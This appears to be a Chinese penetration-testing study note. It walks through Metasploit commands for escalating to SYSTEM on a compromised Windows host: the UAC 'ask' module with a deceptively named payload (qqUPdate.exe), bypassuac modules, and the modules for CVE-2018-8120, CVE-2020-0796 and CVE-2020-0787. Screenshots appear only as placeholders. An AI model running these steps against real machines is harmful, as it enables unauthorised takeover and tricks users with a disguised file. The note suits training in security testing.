内网渗透 day5-msf本地提权(windows)

msf本地提权

1. 利用uac提权

前提与目标机建立会话连接

wps73

seach local/ask     搜索关键字local/ask  

wps74

use 0      进入到exploit/windows/local/ask模块下

wps75

show options 查看相关参数

wps76

set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)

wps77

set session 1     设置会话窗口(先查看一下会话的id)

wps78

run执行

wps79

目标机弹出弹窗

wps80

点击是后,成功进入meterpreter命令行

wps81

这时候getsystem就可以成功提权

wps82

2. 绕过uac认证

search bypassuac     搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)

wps83

use 3     进入编号为3的提权脚本模块

wps84

show opthions 查看相关参数

wps85

查看会话并且设置会话

wps86

show targets 显示可选平台

wps87

set target 0       设置为X86

wps88

run 执行

wps89

提权成功

wps90

3. 利用windows本地提权漏洞进行提权

cve-2018-8120

search cve-2018-8120   查找关键字

wps91

use 0 进入该模块

wps92

show options 查看相关参数

wps93

session 查看会话

wps94

设置为没有权限的会话3

wps95

进入后直接获得管理员权限

wps96

cve-2020-0796

同上

wps97

wps98

wps99

wps100

由于我win10更新过有补丁了

cve-2020-0787

wps101

wps102

提权后操作

wps103

posted @ 2020-11-11 10:59  彩虹猛犸  阅读(652)  评论(0编辑  收藏  举报